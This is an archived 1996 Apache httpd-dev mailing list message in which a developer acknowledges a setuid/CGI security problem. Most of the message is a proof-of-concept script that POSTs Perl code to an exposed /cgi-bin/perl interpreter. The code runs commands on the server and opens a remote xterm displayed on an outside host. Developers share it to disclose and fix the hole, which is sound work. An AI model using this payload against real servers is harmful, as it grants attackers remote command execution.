httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Dirk.vanGulik" <Dirk.vanGu...@jrc.it>
Subject Re: Security interest
Date Fri, 31 May 1996 15:56:12 GMT
Yup :-( it is true, we have to get serious on the setuid stuff
I am afraid.


#!/bin/sh
telnet some-host-somewhere 80 <<"EOM"
POST /cgi-bin/perl HTTP/1.0
Referer: http://elect6:1080/cgi-bin/exploit.pl
Connection: Keep-Alive
User-Agent: Mozilla/3.0b4Gold (X11; I; SunOS 5.4 sun4m)
Host: xyz:1080
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-type: application/x-www-form-urlencoded
Content-length: 167

$|=1;
print "Content-type: text/html\n\n";
print "This is a test.. and we are $< $>.\n";
system("/usr/openwin/bin/xterm -display myhost:0.0&");
print "until here";
EOM

Mime
View raw message